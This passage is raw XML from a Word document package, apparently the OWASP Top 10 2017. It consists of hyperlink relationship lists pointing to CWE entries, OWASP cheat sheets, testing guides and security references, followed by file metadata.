Target="https://cwe.mitre.org/data/definitions/310.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId146" Target="https://cwe.mitre.org/data/definitions/311.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId147" Target="https://cwe.mitre.org/data/definitions/312.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId148" Target="https://cwe.mitre.org/data/definitions/319.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId149" Target="https://cwe.mitre.org/data/definitions/326.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId150" Target="https://cwe.mitre.org/data/definitions/327.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId308" Target="https://cwe.mitre.org/data/definitions/352.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId151"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7" Target="https://cwe.mitre.org/data/definitions/388.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId309" Target="https://cwe.mitre.org/data/definitions/400.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId310" Target="https://cwe.mitre.org/data/definitions/434.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId311" Target="https://cwe.mitre.org/data/definitions/451.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId230"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12" Target="https://cwe.mitre.org/data/definitions/601.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId164" Target="https://cwe.mitre.org/data/definitions/611.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId182"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67" Target="https://cwe.mitre.org/data/definitions/778.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId216" Target="https://cwe.mitre.org/data/definitions/79.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId313" Target="https://cwe.mitre.org/data/definitions/799.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId314"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15" Target="https://cwe.mitre.org/data/definitions/918.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId206" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId165" Target="https://en.wikipedia.org/wiki/Billion_laughs_attack" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId155" Target="https://en.wikipedia.org/wiki/Document_type_definition" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId241" Target="https://en.wikipedia.org/wiki/Heartbleed" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId239" Target="https://en.wikipedia.org/wiki/Internet_of_things" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId232" Target="https://frohoff.github.io/appseccali-marshalling-pickles/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId243"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75" Target="https://github.com/OWASP/ASVS/blob/v4.0.2/4.0/en/0x12-V4-Access-Control.md" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId85"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2"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20" Target="https://github.com/OWASP/Top10/tree/master/2017/datacall" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId323" Target="https://github.com/OWASP/Top10/tree/master/2017/datacall/submissions" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId277"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74" Target="https://github.com/jerryhoff/WebGoat.NET" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId231" Target="https://github.com/mbechler/marshalsec" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId130" Target="https://github.com/p-h-c/phc-winner-argon2" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId251" Target="https://github.com/retirejs/retire.js/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId35" Target="https://lists.owasp.org/mailman/listinfo" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId250"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21"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9"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8" Target="https://owasp.org/projects/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId272"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5" Target="https://owasp.org/www-community/OWASP_Risk_Rating_Methodology" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId271"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6"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61" Target="https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId213" Target="https://owasp.org/www-community/xss-filter-evasion-cheatsheet" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId286"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9"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44" Target="https://owasp.org/www-project-dependency-check/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId214" Target="https://owasp.org/www-project-java-encoder/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId276" Target="https://owasp.org/www-project-juice-shop/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId260" Target="https://owasp.org/www-project-modsecurity-core-rule-set/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId275"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9" Target="https://owasp.org/www-project-proactive-controls/v3/en/c4-encode-escape-data" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId226"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74" Target="https://owasp.org/www-project-proactive-controls/v3/en/c7-enforce-access-controls" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId136" Target="https://owasp.org/www-project-proactive-controls/v3/en/c8-protect-data-everywhere" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId263"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1" Target="https://owasp.org/www-project-secure-headers/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId283" Target="https://owasp.org/www-project-security-knowledge-framework/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId289" Target="https://owasp.org/www-project-security-knowledge-framework/#tab=Main"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5" Target="https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/01-Information_Gathering/10-Map_Application_Architecture" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId190"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6" Target="https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/05-Authorization_Testing/README" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId210" Target="https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId211"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60"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91"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12" Target="https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_DOM-based_Cross_Site_Scripting" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId273" Target="https://owasp.org/www-project-webgoat/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId256"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17" Target="https://portswigger.net/kb/issues/00200308_client-side-template-injection" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId183"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52" Target="https://rubysec.com/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId166" Target="https://secretsofappsecurity.blogspot.tw/2017/01/saml-security-xml-external-entity-attack.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId228" Target="https://speakerdeck.com/pwntester/friday-the-13th-json-attacks" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId227" Target="https://speakerdeck.com/pwntester/surviving-the-java-deserialization-apocalypse" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId280" Target="https://stores.lulu.com/owasp" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId167" Target="https://web-in-security.blogspot.tw/2014/11/detecting-and-exploiting-xxe-in-saml.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId132" Target="https://wikipedia.org/wiki/Bcrypt" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId133" Target="https://wikipedia.org/wiki/PBKDF2" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId131"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8" Target="https://www.cisecurity.org/cis-benchmarks/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId249"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security-framework" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId240" Target="https://www.shodan.io/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId31" Target="https://www.youtube.com/user/OWASPGLOBAL" TargetMode="External" /></Relationships>
</file>

<file path=word/_rels/footnotes.xml.rels><?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId43" Target="0xd1-data-contributors.md" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId199" Target="https://blog.websecurify.com/2017/10/aws-s3-bucket-discovery.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId248" Target="https://cdn2.hubspot.net/hub/203759/file-1100864196-pdf/docs/Contrast_-_Insecure_Libraries_2014.pdf" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId32" Target="https://cheatsheetseries.owasp.org/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId177"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58" Target="https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId204" Target="https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId140" Target="https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId205" Target="https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId225"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29"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64" Target="https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId139"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7" Target="https://cheatsheetseries.owasp.org/cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId138"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162" Target="https://cheatsheetseries.owasp.org/cheatsheets/XML_Security_Cheat_Sheet.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId194" Target="https://csrc.nist.gov/publications/detail/sp/800-123/final" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId258" Target="https://csrc.nist.gov/publications/detail/sp/800-61/rev-2/final" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId238" Target="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId196" Target="https://cwe.mitre.org/data/definitions/16.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId195" Target="https://cwe.mitre.org/data/definitions/2.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId179" Target="https://cwe.mitre.org/data/definitions/22.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId144" Target="https://cwe.mitre.org/data/definitions/220.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId266" Target="https://cwe.mitre.org/data/definitions/223.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId180" Target="https://cwe.mitre.org/data/definitions/284.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId181"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5" Target="https://cwe.mitre.org/data/definitions/310.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId146" Target="https://cwe.mitre.org/data/definitions/311.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId147" Target="https://cwe.mitre.org/data/definitions/312.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId148" Target="https://cwe.mitre.org/data/definitions/319.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId149" Target="https://cwe.mitre.org/data/definitions/326.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId150" Target="https://cwe.mitre.org/data/definitions/327.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId308" Target="https://cwe.mitre.org/data/definitions/352.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId151"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7" Target="https://cwe.mitre.org/data/definitions/388.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId309" Target="https://cwe.mitre.org/data/definitions/400.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId310" Target="https://cwe.mitre.org/data/definitions/434.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId311" Target="https://cwe.mitre.org/data/definitions/451.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId230"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12" Target="https://cwe.mitre.org/data/definitions/601.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId164" Target="https://cwe.mitre.org/data/definitions/611.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId182"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67" Target="https://cwe.mitre.org/data/definitions/778.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId216" Target="https://cwe.mitre.org/data/definitions/79.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId313" Target="https://cwe.mitre.org/data/definitions/799.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId314"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15" Target="https://cwe.mitre.org/data/definitions/918.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId206" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId165" Target="https://en.wikipedia.org/wiki/Billion_laughs_attack" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId155" Target="https://en.wikipedia.org/wiki/Document_type_definition" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId241" Target="https://en.wikipedia.org/wiki/Heartbleed" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId239" Target="https://en.wikipedia.org/wiki/Internet_of_things" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId232" Target="https://frohoff.github.io/appseccali-marshalling-pickles/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId243" Target="https://github.com/OWASP/ASVS/blob/v4.0.2/4.0/en/0x10-V1-Architecture.md"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75" Target="https://github.com/OWASP/ASVS/blob/v4.0.2/4.0/en/0x12-V4-Access-Control.md" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId85" Target="https://github.com/OWASP/ASVS/blob/v4.0.2/4.0/en/0x13-V5-Validation-Sanitization-Encoding.md" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId125" Target="https://github.com/OWASP/ASVS/blob/v4.0.2/4.0/en/0x14-V6-Cryptography.md" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId126" Target="https://github.com/OWASP/ASVS/blob/v4.0.2/4.0/en/0x16-V8-Data-Protection.md" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId127" Target="https://github.com/OWASP/ASVS/blob/v4.0.2/4.0/en/0x17-V9-Communications.md" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId192" Target="https://github.com/OWASP/ASVS/blob/v4.0.2/4.0/en/0x22-V14-Config.md" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId47" Target="https://github.com/OWASP/DevGuide" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId26" Target="https://github.com/OWASP/Top10/issues" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId320" Target="https://github.com/OWASP/Top10/tree/master/2017/datacall" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId323" Target="https://github.com/OWASP/Top10/tree/master/2017/datacall/submissions" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId277"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74" Target="https://github.com/jerryhoff/WebGoat.NET" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId231" Target="https://github.com/mbechler/marshalsec" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId130" Target="https://github.com/p-h-c/phc-winner-argon2" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId251" Target="https://github.com/retirejs/retire.js/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId35" Target="https://lists.owasp.org/mailman/listinfo" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId250"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21"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9" Target="https://owasp.org/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId33" Target="https://owasp.org/chapters/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId34" Target="https://owasp.org/events/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId278" Target="https://owasp.org/projects/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId272"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5" Target="https://owasp.org/www-community/OWASP_Risk_Rating_Methodology" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId271"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46"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61" Target="https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId213" Target="https://owasp.org/www-community/xss-filter-evasion-cheatsheet" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId286" Target="https://owasp.org/www-pdf-archive/Owasp-ciso-guide.pdf" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId39" Target="https://owasp.org/www-project-application-security-verification-standard/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId259"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44" Target="https://owasp.org/www-project-dependency-check/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId214" Target="https://owasp.org/www-project-java-encoder/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId276" Target="https://owasp.org/www-project-juice-shop/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId260" Target="https://owasp.org/www-project-modsecurity-core-rule-set/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId275"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9" Target="https://owasp.org/www-project-proactive-controls/v3/en/c4-encode-escape-data" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId226"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74" Target="https://owasp.org/www-project-proactive-controls/v3/en/c7-enforce-access-controls" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId136" Target="https://owasp.org/www-project-proactive-controls/v3/en/c8-protect-data-everywhere" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId263"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41" Target="https://owasp.org/www-project-secure-headers/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId283" Target="https://owasp.org/www-project-security-knowledge-framework/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId289" Target="https://owasp.org/www-project-security-knowledge-framework/#tab=Main"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45" Target="https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/01-Information_Gathering/10-Map_Application_Architecture" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId190"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6" Target="https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/05-Authorization_Testing/README" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId210" Target="https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId211"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60"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91" Target="https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/08-Testing_for_Error_Handling/README" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId142" Target="https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/README" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId212" Target="https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_DOM-based_Cross_Site_Scripting" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId273" Target="https://owasp.org/www-project-webgoat/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId256"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17" Target="https://portswigger.net/kb/issues/00200308_client-side-template-injection" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId183"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52" Target="https://rubysec.com/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId166" Target="https://secretsofappsecurity.blogspot.tw/2017/01/saml-security-xml-external-entity-attack.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId228" Target="https://speakerdeck.com/pwntester/friday-the-13th-json-attacks" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId227" Target="https://speakerdeck.com/pwntester/surviving-the-java-deserialization-apocalypse" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId280" Target="https://stores.lulu.com/owasp" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId167" Target="https://web-in-security.blogspot.tw/2014/11/detecting-and-exploiting-xxe-in-saml.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId132" Target="https://wikipedia.org/wiki/Bcrypt" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId133" Target="https://wikipedia.org/wiki/PBKDF2" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId131"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8" Target="https://www.cisecurity.org/cis-benchmarks/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId249"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security-framework" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId240" Target="https://www.shodan.io/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId31"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2021-08-13T20:19:22Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-08-13T20:19:22Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>